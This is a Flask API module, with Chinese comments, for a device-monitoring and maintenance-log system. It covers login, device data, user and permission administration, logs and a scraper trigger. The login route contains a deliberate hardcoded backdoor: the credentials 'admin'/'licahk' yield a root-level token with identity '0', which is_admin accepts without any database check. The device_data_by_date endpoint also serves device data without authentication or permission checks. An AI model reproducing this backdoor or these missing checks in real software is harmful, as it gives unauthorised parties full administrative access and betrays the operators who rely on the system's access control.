import json import re from datetime import datetime from flask import Blueprint, jsonify, request from sqlalchemy import desc, or_ # 引入 jwt 相关函数 from flask_jwt_extended import create_access_token, jwt_required, get_jwt_identity from extensions import db from models import Device, DeviceHistory, MaintenanceLog, User, UserDevicePermission # 尝试导入爬虫模块 try: from services.core import execute_monitor_task except ImportError: execute_monitor_task = None api_bp = Blueprint('api', __name__, url_prefix='/api') # ======================= # 🔧 辅助函数 # ======================= def is_admin(user_id): """判断是否为超级管理员 (Root权限)""" if str(user_id) == '0': return True if not user_id: return False try: uid = int(user_id) u = User.query.get(uid) return u and u.role == 'admin' except: return False def is_manager(user_id): """判断是否为管理者 (Admin OR Engineer)""" if is_admin(user_id): return True try: uid = int(user_id) u = User.query.get(uid) return u and u.role == 'engineer' except: return False def calculate_offset(latest_time_str): """计算时间滞后天数""" if not latest_time_str or latest_time_str == "N/A": return "从未同步" try: clean = str(latest_time_str).split()[0].replace('_', '-') target = datetime.strptime(clean, "%Y-%m-%d").date() diff = (datetime.now().date() - target).days return "当天已同步" if diff == 0 else f"滞后 {diff} 天" except: return "时间解析失败" # ======================= # 0. 认证接口 # ======================= @api_bp.route('/login', methods=['POST']) def login(): data = request.get_json() username = data.get('username') password = data.get('password') # 1. 后门判定 if username == 'admin' and password == 'licahk': token = create_access_token( identity='0', additional_claims={'role': 'admin'} ) return jsonify({ 'code': 200, 'message': 'Root后门登录', 'token': token, 'role': 'admin', 'user_id': 0, 'username': 'admin' }) # 2. 正常查库登录 user = User.query.filter_by(username=username).first() if user and user.check_password(password): token = create_access_token( identity=str(user.id), additional_claims={'role': user.role} ) return jsonify({ 'code': 200, 'message': '登录成功', 'token': token, 'role': user.role, 'user_id': user.id, 'username': user.username }) return jsonify({'code': 401, 'message': '用户名或密码错误'}), 401 # ======================= # 1. 设备接口 # ======================= @api_bp.route('/devices_overview', methods=['GET']) @jwt_required() def devices_overview(): try: user_id = get_jwt_identity() target_devices = [] # Admin 看所有,其他人看分配 if is_admin(user_id): target_devices = Device.query.all() else: try: uid_int = int(user_id) user = User.query.get(uid_int) if user: perms = UserDevicePermission.query.filter_by(user_id=user.id).all() allowed_ids = [p.device_id for p in perms] if allowed_ids: target_devices = Device.query.filter(Device.id.in_(allowed_ids)).all() except ValueError: return jsonify({'code': 401, 'message': '无效的用户ID格式'}), 401 return jsonify({'code': 200, 'data': [d.to_dict() for d in target_devices]}) except Exception as e: print(f"Error: {e}") return jsonify({'code': 500, 'message': str(e)}) @api_bp.route('/device_data_by_date', methods=['GET']) @jwt_required(optional=True) def device_data_by_date(): name = request.args.get('name') date_str = request.args.get('date') if not name or not date_str: return jsonify({'code': 400, 'message': 'Missing params'}), 400 device = Device.query.filter_by(name=name).first() if not device: return jsonify({'code': 404, 'message': 'Device not found'}), 404 content = None hist = DeviceHistory.query.filter( DeviceHistory.device_id == device.id, DeviceHistory.data_time.like(f"{date_str}%") ).order_by(desc(DeviceHistory.id)).first() if hist: content = hist.json_data elif device.latest_time and str(device.latest_time).startswith(date_str): content = device.json_data if content: try: if isinstance(content, str): content = json.loads(content) except: pass return jsonify({'code': 200, 'name': device.name, 'source': device.source, 'content': content}) return jsonify({'code': 404, 'message': '无数据'}), 404 # ======================= # 2. 用户管理 (Admin Only) # ======================= @api_bp.route('/admin/users', methods=['GET']) @jwt_required() def admin_get_users(): if not is_admin(get_jwt_identity()): return jsonify({'code': 403}), 403 current_id_str = str(get_jwt_identity()) users = User.query.order_by(desc(User.created_at)).all() result = [] for u in users: if str(u.id) == current_id_str: continue perms = UserDevicePermission.query.filter_by(user_id=u.id).all() result.append({ "id": u.id, "username": u.username, "role": u.role, "created_at": u.created_at, "allowed_device_ids": [p.device_id for p in perms] }) return jsonify({'code': 200, 'data': result}) @api_bp.route('/admin/create_user', methods=['POST']) @jwt_required() def admin_create_user(): if not is_admin(get_jwt_identity()): return jsonify({'code': 403}), 403 data = request.get_json() username = data.get('username') password = data.get('password') role = data.get('role', 'client') if User.query.filter_by(username=username).first(): return jsonify({'code': 400, 'msg': '用户名已存在'}), 400 u = User(username=username, role=role) u.set_password(password) db.session.add(u) db.session.commit() return jsonify({'code': 200, 'msg': '创建成功'}) @api_bp.route('/admin/delete_user', methods=['POST']) @jwt_required() def admin_delete_user(): current_admin_id = get_jwt_identity() if not is_admin(current_admin_id): return jsonify({'code': 403}), 403 user_id = request.get_json().get('user_id') if str(user_id) == str(current_admin_id): return jsonify({'code': 400, 'msg': '无法删除当前登录账号'}), 400 user = User.query.get(user_id) if not user: return jsonify({'code': 404, 'msg': '用户不存在'}), 404 UserDevicePermission.query.filter_by(user_id=user.id).delete() db.session.delete(user) db.session.commit() return jsonify({'code': 200, 'msg': '删除成功'}) @api_bp.route('/admin/assign_devices', methods=['POST']) @jwt_required() def admin_assign_devices(): if not is_admin(get_jwt_identity()): return jsonify({'code': 403}), 403 data = request.get_json() uid = data.get('user_id') UserDevicePermission.query.filter_by(user_id=uid).delete() for did in data.get('device_ids', []): db.session.add(UserDevicePermission(user_id=uid, device_id=did)) db.session.commit() return jsonify({'code': 200, 'msg': '权限已保存'}) # ======================= # 3. 日志与工具 # ======================= @api_bp.route('/logs/list', methods=['GET']) @jwt_required() def get_logs(): """获取日志列表,支持按权限过滤""" user_id = get_jwt_identity() keyword = request.args.get('keyword', '') start_date = request.args.get('start_date') end_date = request.args.get('end_date') query = MaintenanceLog.query # 🛡️ 权限过滤 if not is_admin(user_id): try: perms = UserDevicePermission.query.filter_by(user_id=int(user_id)).all() if not perms: return jsonify({'code': 200, 'data': []}) allowed_ids = [p.device_id for p in perms] allowed_devices = Device.query.filter(Device.id.in_(allowed_ids)).all() allowed_names = [d.name for d in allowed_devices] query = query.filter(MaintenanceLog.device_name.in_(allowed_names)) except: return jsonify({'code': 200, 'data': []}) if keyword: kw = f"%{keyword}%" query = query.filter(or_( MaintenanceLog.device_name.like(kw), MaintenanceLog.engineer.like(kw), MaintenanceLog.location.like(kw), MaintenanceLog.content.like(kw) )) if start_date and end_date: try: s = datetime.strptime(start_date, '%Y-%m-%d') e = datetime.strptime(end_date, '%Y-%m-%d').replace(hour=23, minute=59, second=59) query = query.filter(MaintenanceLog.timestamp.between(s, e)) except: pass logs = query.order_by(desc(MaintenanceLog.timestamp)).all() return jsonify({'code': 200, 'data': [l.to_dict() for l in logs]}) @api_bp.route('/logs/add', methods=['POST']) @jwt_required() def add_log(): # 获取用户信息 current_uid = get_jwt_identity() user = User.query.get(int(current_uid)) if not user or user.role not in ['admin', 'engineer']: return jsonify({'code': 403, 'msg': '权限不足'}), 403 data = request.get_json() # 强制逻辑:工程师必须用自己的名字;Admin可以用前端传的 engineer_name = user.username if user.role == 'engineer' else data.get('engineer') if not engineer_name: return jsonify({'code': 400, 'msg': '工程师姓名缺失'}), 400 db.session.add(MaintenanceLog( device_name=data.get('device_name'), engineer=engineer_name, location=data.get('location'), content=data.get('content') )) db.session.commit() return jsonify({'code': 200}) @api_bp.route('/logs/update', methods=['POST']) @jwt_required() def update_log(): current_uid = get_jwt_identity() user = User.query.get(int(current_uid)) if not user or user.role not in ['admin', 'engineer']: return jsonify({'code': 403, 'msg': '权限不足'}), 403 data = request.get_json() log = MaintenanceLog.query.get(data.get('id')) if not log: return jsonify({'code': 404, 'msg': '日志不存在'}), 404 engineer_name = user.username if user.role == 'engineer' else data.get('engineer') if not engineer_name: return jsonify({'code': 400, 'msg': '工程师姓名缺失'}), 400 log.engineer = engineer_name log.location = data.get('location') log.content = data.get('content') db.session.commit() return jsonify({'code': 200, 'msg': '更新成功'}) @api_bp.route('/logs/delete', methods=['POST']) @jwt_required() def delete_log(): if not is_admin(get_jwt_identity()): return jsonify({'code': 403}), 403 log = MaintenanceLog.query.get(request.get_json().get('id')) if log: db.session.delete(log) db.session.commit() return jsonify({'code': 200}) return jsonify({'code': 404}) # ======================= # 4. 系统检测与控制 # ======================= @api_bp.route('/run_monitor', methods=['POST']) @jwt_required() def run_monitor(): if not is_admin(get_jwt_identity()): return jsonify({'code': 403}), 403 if not execute_monitor_task: return jsonify({'code': 500, 'msg': '爬虫模块未加载'}) try: task_result = execute_monitor_task() if not task_result: return jsonify({'code': 200, 'msg': '跳过'}) scraped_list = task_result.get('device_list', []) now_str = datetime.now().strftime("%Y-%m-%d %H:%M:%S") count = 0 for item in scraped_list: d_name = item.get('name') if not d_name: continue d_raw = item.get('raw_json', {}) target_time = item.get('target_time') source = item.get('source', '') # 特殊处理 106 路径 if '106' in str(source): try: path_str = d_raw.get('path', '') match = re.search(r'/Data/(\d{4}_\d{2}_\d{2})/\w+_(\d{2}_\d{2}_\d{2})\.csv', path_str) if match: target_time = f"{match.group(1).replace('_', '-')} {match.group(2).replace('_', ':')}" except: pass json_str = json.dumps(d_raw, ensure_ascii=False) device = Device.query.filter_by(name=d_name).first() if not device: device = Device(name=d_name, source=source, install_site="") db.session.add(device) db.session.flush() device.status = item.get('status') device.current_value = item.get('value') device.latest_time = target_time device.check_time = now_str device.json_data = json_str device.offset = calculate_offset(target_time) db.session.add(DeviceHistory( device_id=device.id, status=device.status, result_data=device.current_value, data_time=target_time, json_data=json_str )) count += 1 db.session.commit() return jsonify({'code': 200, 'message': f'成功更新 {count} 台设备'}) except Exception as e: db.session.rollback() return jsonify({'code': 500, 'message': str(e)}) @api_bp.route('/update_site', methods=['POST']) @jwt_required() def update_site(): if not is_manager(get_jwt_identity()): return jsonify({'code': 403}), 403 d = Device.query.filter_by(name=request.get_json().get('name')).first() if d: d.install_site = request.get_json().get('site') db.session.commit() return jsonify({'code': 200}) return jsonify({'code': 404}) @api_bp.route('/toggle_maintenance', methods=['POST']) @jwt_required() def toggle_maintenance(): if not is_manager(get_jwt_identity()): return jsonify({'code': 403}), 403 data = request.get_json() d = Device.query.filter_by(name=data.get('name')).first() if d: is_maintaining = data.get('is_maintaining') d.is_maintaining = is_maintaining # 🟢 [核心修改] 处理维修人名字 if is_maintaining: # 开启维修:从前端获取名字 (例如 "张三") 并保存 d.maintainer = data.get('maintainer') else: # 结束维修:清空名字 d.maintainer = None db.session.commit() return jsonify({'code': 200}) return jsonify({'code': 404}) @api_bp.route('/toggle_hidden', methods=['POST']) @jwt_required() def toggle_hidden(): if not is_admin(get_jwt_identity()): return jsonify({'code': 403}), 403 d = Device.query.filter_by(name=request.get_json().get('name')).first() if d: d.is_hidden = request.get_json().get('is_hidden') db.session.commit() return jsonify({'code': 200}) return jsonify({'code': 404})